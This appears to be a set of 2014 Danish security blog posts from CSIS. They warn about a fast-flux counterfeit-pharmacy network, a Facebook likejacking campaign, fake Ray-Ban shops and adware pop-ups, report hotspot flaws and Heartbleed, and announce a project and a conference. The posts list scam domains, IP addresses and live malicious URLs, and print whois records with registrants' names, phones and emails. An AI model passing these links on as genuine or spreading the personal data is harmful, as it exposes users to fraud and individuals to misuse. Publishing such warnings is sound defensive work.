Det deobfuskerede indhold afslører at javascriptet flytter brugeren til domænet: thewelnesshealthcare.com som fastfluxer. Det betyder at flere IP adresser er i spil, som gengivet herunder:
91.218.125.233 - Netherlands Amsterdam Serveo
85.195.72.243 - Hanau Am Main Velia.net
185.16.37.118 - Poland Skytechnology Sp. Z O.o.
178.19.107.91 - Poland Tarnowskie Gory Sitel
188.132.207.163 - Turkey Istanbul Hosting Internet
193.218.154.106 - Poland Gdynia Superhost.pl
212.83.186.116 - France Lyon Online
Serverne kan relateres direkte til massevis af domæner, hvorfra der distribueres tvivlsom medicinal produkter som man bør undgå.
Et lille udsnit af uønskede domæner findes herunder:
levitrapesq.com
bg.levitrapesq.com
salewelloch.com
cialisdoctor.com
nursingpharm.com
thelovenight.com
canadavasomax.com
healthviagras.com
medicarehertz.com
theherbalmeds.com
enternightlove.com
medwelmedifast.com
ranksaleviagra.com
thelevitrapill.com
thetabgenerics.com
healthtabmental.com
medicareviagras.com
mail.medicareviagras.com
pharmacycaution.com
alec.secur.pharmacycaution.com
salesmartphones.com
tabletdietpills.com
thedietpharmacy.com
theprivatelines.com
cialisrxerectile.com
lossdietpharmacy.com
dietpillsgenerics.com
genericstableteva.com
afford.some.genericstableteva.com
badoo.pharmherbalhealth.com
thegenericsviagra.com
welnesshealthcare.com
toronto.rx.welnesshealthcare.com
welnesshealthcare.com
sunny.welnesshealthcare.com
mastersdegreepharm.com
levitratabkorsinsky.com
viagralevifiduciary.com
mail.viagralevifiduciary.com
thewelnesshealthcare.com
welnessasaletraining.com
rxhealthcarehealthcare.com
drugstoreviagrapharmacy.com
prescriptionmedicinehcg.com
pillmedicineprescription.com
medicinewelnessveterinary.com
prescriptionhealthcaution.com
healthcarepharmacypharmacists.com
healthcarepharmpharmaceutical.com
addi.hghmedpharm.net
saleswelness.net
ryanairemedies.net
mail.ryanairemedies.net
thepharmherbal.net
rxmedicinegroup.net
[..]
Ovenstående er et lille udsnit af ca. 1700 domæner som er knyttet til denne lyssky forretning.
Vi har naturligvis blokeret alle disse domæner i CSIS Secure DNS, men en anden løsning er at filtre trafik til de føromtalte IP adresser i sin perimeter.
CSIS anbefaler, at man holder sig langt væk fra denne slags markedsføring og ikke mindst tvivlsomme produkter. Dels kan kvaliteten og lovligheden af præparaterne ikke bekræftes og dels vil kreditkort oplysninger i forbindelse med betalingen, havne i forkerte hænder med risiko for misbrug.
CSIS Blog: Falsk nyhed om fund af Malayisk fly
Skæbnen omkring det forsvundne fly fra Malaysia Airlines og de 239 personer om bord er fortsat uvis. Historien har naturligvis trukket internationale overskifter og er en af de mest læste nyheder på nettet.
Af samme grund overrasker det os ikke, at der i disse timer florerer en "likejacking" kampagne på Facebook som hævder at flyet er fundet i Vietnam.
Kampagnen spreder sig som en virvelvind og anvender snedig viral markedsføring og likejacking:
Kan en naiv bruger lokkes til at klikke på linket og samtidig fristes til at "synes godt om" vil det selvsamme link blive postet på brugerens væg og delt mellem venner og bekendte. Derved opnår den en viral effekt som kombineret med nyhedens tyngde er forklaringen på at den spreder sig så hastigt som den gør.
Kampagnen spreder sig via domænet (mellemrum indlagt af CSIS)
https://galaxysorteo.com/plane/crash.html?me
Fra samme side spreder også en Likejacking kampagne baseret på popstjernen Rihanne
https://galaxysorteo.com/rihanna/
Og en tredje kampagne hostet på samme side lokker med overskriften:
"Poor girl make the biggest mistake of her life on a live Beauty contest"
Domænet har vi blokeret i CSIS Secure DNS og Heimdal PRO/corporate.
Generelt gælder rådet fortsat, at man skal udvise synd fornuft og kritisk sans.
Mere information om Likejacking:
https://www.csis.dk/da/csis/blog/4118/
CSIS Nyheder: Flere sårbarheder i TDC Yousee hotspots
CSIS har fundet flere kritiske sårbarheder i TDC's Yousee hotspot implementering som kan give adgang til private oplysninger og eksponere følsom netværksdata for uvedkommende.
Vi har rapporteret problemet til TDC, med tekniske detaljer, som af samme årsag har valgt at deaktivere samtlige Wifi hotspots i hele Danmark, mens der arbejdes på en permanent løsning på problemet.
Vi estimerer at ca. 100.000 Yousee kunder har været berørt af dette sikkerhedsproblem.
CSIS vil af respekt for producenterne af det berørte udstyr, Yousee samt de mange berørte kunder, ikke frigive yderligere oplysninger på nuværende tidspunkt.
TDC Yousee har, som reaktion på vores fund, postet et kort statement på deres hjemmeside:
http://yousee.dk/Wifi/Spoergsmaal_og_svar_om_Wifi.aspx
CSIS Blog: Billige solbriller?
Vi har sagt det før og nu siger vi det igen: Hvis et tilbud er for godt til at være sandt... - så er det det nok også.
I dag - og kun i dag - kan man således få lækre Ray-Ban briller med 88% rabat. Hvis man da tør. Kampangen kører intenst på Facebook i disse timer og linker til primært 2 websider: denmarkraybanstore.com og dkmyfashion.com som redirrigerer til raybanshop-danmark.com.
Begge webbutikker er kinesisk registrede, helt identiske og er tilmed oprettet i dag, d. 3. april 2014. De er rigtigt fint lavet og baseret på eCommerce platformen Zen-cart. Vi tillader os dog at tvivle på bagmandens hensigter, og våger at påstå at der enten er tale om kopivarer eller totalt svindel hvor pengene blot forsvinder ud i cyberspace for evigt.
Whois:
Domain Name: denmarkraybanstore.com
Registry Domain ID: 108910494_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.west263.com
Registrar URL: www.west263.com
Last updated Date: 2014-04-03 12:59:17
Creation Date: 2014-04-03 12:59:17
Expiration Date: 2015-04-03 12:59:17
Registrar Registration Expiration Date: 2015-04-03 12:59:17
Registrar: Chengdu west dimension digital technology Co., LTD
Registrar IANA ID: 1556
Registrar Abuse Contact Email: domain@west263.com
Registrar Abuse Contact Phone: +86.02886263960-245
Domain Status: ok
Registry Registrant ID: 1556-1100106-d-001
Registrant Name: yong qian
Registrant Organization: qian yong
Registrant Street: Yue Xiu Qu Bei Jing Jie Dao Tu
Registrant City: guang zhou shi
Registrant State/Province: BJ
Registrant Postal Code: 510030
Registrant Country: cn
Registrant Phone: 020-87574563
Registrant Fax: 0648-68498454
Registrant Email: Vipglasses2014@2980.com
----
Domain name: dkmyfashion.com
Registry Domain ID:
Registrar WHOIS Server: whois.dns.com.cn
Registrar URL: http://www.dns.com.cn
Updated Date: 2014-03-18T20:37:26Z
Creation Date: 2014-03-18T20:37:26Z
Registrar Registration Expiration Date: 2015-03-18T20:37:26Z
Registrar: Beijing Innovative Linkage Technology Ltd.Registrar IANA ID: 633
Registrar Abuse Contact Email: abuse@dns.com.cn
Registrar Abuse Contact Phone: +86.1082151122
Reseller:Domain Status: clientTransferProhibitedRegistry
Registrant ID:Registrant Name: Jones Jac
Registrant Organization: Organization
Registrant Street: 2014 hutong
Registrant City: beijing
Registrant State/Province: BJ
Registrant Postal Code: 100089
Registrant Country: CN
Registrant Phone: +86.1059928888
Registrant Phone Ext:
Registrant Fax: +86.1059928888
Registrant Fax Ext:
Registrant Email: 2784764424@qq.com
----
Domain name: raybanshop-danmark.com
Registry Domain ID:
Registrar WHOIS Server: whois.dns.com.cn
Registrar URL: http://www.dns.com.cn
Updated Date: 2014-03-09T22:21:06Z
Creation Date: 2014-03-09T22:21:06Z
Registrar Registration Expiration Date: 2015-03-09T22:21:06Z
Registrar: Beijing Innovative Linkage Technology Ltd.
Registrar IANA ID: 633
Registrar Abuse Contact Email: abuse@dns.com.cn
Registrar Abuse Contact Phone: +86.1082151122
Reseller:Domain Status: clientTransferProhibited
Registry Registrant ID:
Registrant Name: Jones Jac
Registrant Organization: Organization
Registrant Street: 2014 hutong
Registrant City: beijing
Registrant State/Province: BJ
Registrant Postal Code: 100089
Registrant Country: CN
Registrant Phone: +86.1059928888
Registrant Phone Ext:
Registrant Fax: +86.1059928888
Registrant Fax Ext:
Registrant Email: 2784764424@qq.com
CSIS Blog: Bølge af uønskede popups på danske websider
En uønsket BHO (Browser Helper Object) malware hjemsøger i disse dage store danske websider, hvor ofret skal lokkes ind i en konkurrence karusel. Der laves et pop-up vindue på flere store danske websider som skyldes at maskinen er inficeret med en malware/adware komponent. Dette fænomen er indtil videre begrænset til Microsoft Windows maskiner.
CSIS analyserer i øjeblikket en BHO (Browser Helper Object) som anvendes til at indsætte uønskede popup vinduer på store danske websider herunder flere netbanker og online butikker. Der lokkes med en konkurrence hvor ofret kan vinde spændende og kostbare gaver, men forinden skal der opgives forskellige følsomme data hvilket man naturligvis skal afstå fra.
Vi kan relatere følgende websider til denne konkurrence svindel som altså skyldes at maskinen er inficeret med malware som hooker browseren.
com-opinions.com
the-official-survey.com
web-choices.com
imakemoneyonline.info
survey.com-opinions.com
Alle domænerne er allerede blokeret i CSIS Secure DNS og Heimdal PRO/Corporate.
Domænerne er whois privacy protected og købt på samme tidspunkt og alle er hostet på samme DNS server: DNS1.STABLETRANSIT.COM.
Infektionerne stammer fra en installationspakke som bundler denne uønskede "adware" komponent. En af disse er applikationen "Youtube Lyrics" som udspringer fra: youtubegizmos.com samt Browser Surf Plus og ZoomEx (Firefox extension).
Linksne leder brugeren hen til surveys som de ovenstående. De ender med tilbuddet om billige smartphones / sko / navigation / iPod, men lad være med at falde for tricket. Der er tale om abonnementskarruseller, og prisen for at være med er op i mod 500 kr/md.
Hvis du alligevel synes at tilbudet virker attraktivt, kan du tage et kig på hvad tidligere "kunder" skriver:
http://www.trustpilot.dk/review/jukebux.com
Sådan fjerner du den uønskede browser hijacker
1) Gå til start
2) Kontrolpanel
3) Tilføj/fjern programmer
4) Find "Browser Surf Plus" og vælg fjern
5) Genstart maskinen
Den seneste variant af denne Adware (AdWare.BetterSurf) giver os et antivirus signatur resultat på 32/51:
https://www.virustotal.com/da/file/073e78dd985ac558a7acf52f8c633a1874a3818b4431ab8c638b5aa78230078e/analysis/
Herunder findes et link til yderligere oplysninger:
https://forum.videolan.org/viewtopic.php?f=14&t=116118
CSIS Nyheder: TLS "Hjertebløder" fejl i OpenSSL
En kritisk fejl i et krypto bibliotek (heartbeat funktionalitet), som estimeres til at blive anvendt i to tredjedele af alle OpenSSL implementeringer, giver mulig for at læse krypteret indhold i sikker webkommunikation. Problemet rammer både Apache, NGINX og TOR samt talrige andre services. OpenSSL har besvaret fejlen ved at frigive version 1.0.1g.
Fejlen, som har eksisteret i mere end to år, i flere versioner af produktionsudgaven af OpenSSL, har åbnet mulighed for Man-in-the-Middle angreb, hvor en person kan misbruge implementeringssvagheden til at lytte med på krypteret trafik. Problemet skyldes, teknisk set, et manglende bounds check under håndtering i TLS heartbeat udvidelsen (RFC6520) som udløser et read overrun.. Fejlen befinder sig i alle OpenSSL baserede services og ikke udelukkende HTTPS, men også SMTP med STARTTLS, IMAP over SSL og FTP over SSL.
Denne sårbarhed har fået kælenavnet "Heartbleed" og modtaget følgende CVE-ID: CVE-2014-0160. Hullet har massive downstream komplikationer og alle som anvender ELB er sårbare.
Bemærk, at den centrale del af denne sårbarhed, som sådan ikke udelukkende er isoleret til OpenSSL men det faktum at dine private nøgler til server-side certificater er eksponeret for tredjepart. En angriber kan stjæle private certifikater, brugernavne/passwords, email, og foretningskritiske dokumenter og kommunikation.
OpenSSL fra version 1.0.1 til 1.0.1f og 1.0.2-beta er sårbare. CSIS anbefaler at alle opgraderer til version 1.0.1g eller som et "workaround" kompilerer OpenSSL til at bruges uden heartbeats udvidelsen: "-DOPENSSL_NO_HEARTBEATS". Derudover skal man skifte den private nøgle som er knyttet til installationen.
PoC er i omløb, hvilket øger risikoen for misbrug betragteligt.
Der er tilmed oprettet en webside, hvorfra man kan teste om ens services/applikationer er sikre:
http://filippo.io/Heartbleed/
Bemærk, at denne udelukkende checker webservices.
Yderligere oplysninger:
http://heartbleed.com/
https://www.openssl.org/news/secadv_20140407.txt
Teknisk analyse:
http://blog.existentialize.com/diagnosis-of-the-openssl-heartbleed-bug.html
CSIS Nyheder: Europæisk projekt til kamp mod online trusler
SWEPT er et akronym for “Securing Websites through malware dEtection and attack prevention Technologies”
Det ny-etablerede konsortium meddelte i dag, at det med succes har lanceret SWEPT, med det første officielle kick-off møde afholdt den 18. og 19 marts 2014 i Bilbao, Spanien.
SWEPT er støttet med € 1.99 millioner fra “the European Union ICT Policy Support Programme” som led i “the Competitiveness and Innovation Framework Programme” (CIP).
Målet med SWEPT er at udvikle en multistrenget sikkerhedsteknolgi som kan migre ondsindede angreb mod usikre websider. Derudover sigter projektet på at udarbejde en de facto standard for sikker opsætning og vedligeholdelse af websider.
SWEPT consortiet er styret af TECNALIA (Spanien) og omfatter derudover EUROHELP (Spainen), MONTIMAGE (Frankrig), EVERIS (Spainen), CYBERDEFCON (UK), Emaze Networks S.p.A. (Italien), S21sec Labs (Spanien), Amis d.o.o. (Svovalkiet), CSIS Security Group (Danmark), ARSYS (Spanien) and ARIMA (Spanien).
En komplet pressemeddelelse og mere detaljeret beskrivelse af problemet på Engelsk kan findes på adressen:
https://www.csis.dk/en/csis/blog/4173/
CSIS Nyheder: Invitation til CCCC14
CSIS inviterer hermed til årets mest betydningsfulde IT-sikkerhedskonference på dansk jord. Konferencen vil byde på internationale talere og flere af de mest anerkendte eksperter indenfor Cybercrime.
Det er med en stor portion stolthed, at vi igen i år kan invitere til årets vigtigste it-sikkerheds konference på dansk jord med fokus på temaet Cybercrime.
Copenhagen CyberCrime Conference (CCCC14) afholdes d. 12.6. 2014 på PwC's hovedsæde i København.
CCCC14 vil byde på flere af verdens ypperste og mest anerkendte specialister indenfor moderne Cybercrime.
Talerne vil spænde bredt over temaet Cybercrime fra raffinerede DDoS angreb til avancerede informationstyve, over Advanced Persistent Threats til Wikileaks og Snowden.
Det er bl.a. lykkedes os at tiltrække (i vilkårlig rækkefølge):
Righard Zwienenberg fra ESET
Simon Pope fra Microsoft
Mikko Hypponen fra F-Secure
Paul Vixie fra Farsight
Chuck Esposito fra FBI
Troels Oerting fra Europol
David Jacoby fra Kaspersky
... samt mange mange flere.
En komplet liste over de mange talere samt biografi kan findes på konfererencens officielle webside. Link følger.
Der vil, ligesom sidste år, være rift om pladserne, så vi anbefaler at man tilmelder sig med det samme!
Alle kunder hos CSIS har mulighed for at deltage på konferencen uden beregning.
Program og tilmelding foregår via CCCC14's officielle webside, hvor der også findes yderligere information om indholdet, de respektive talere og de tre forskellige tracks:
http://cccc-2014.com/
Vi glæder os til at se dig!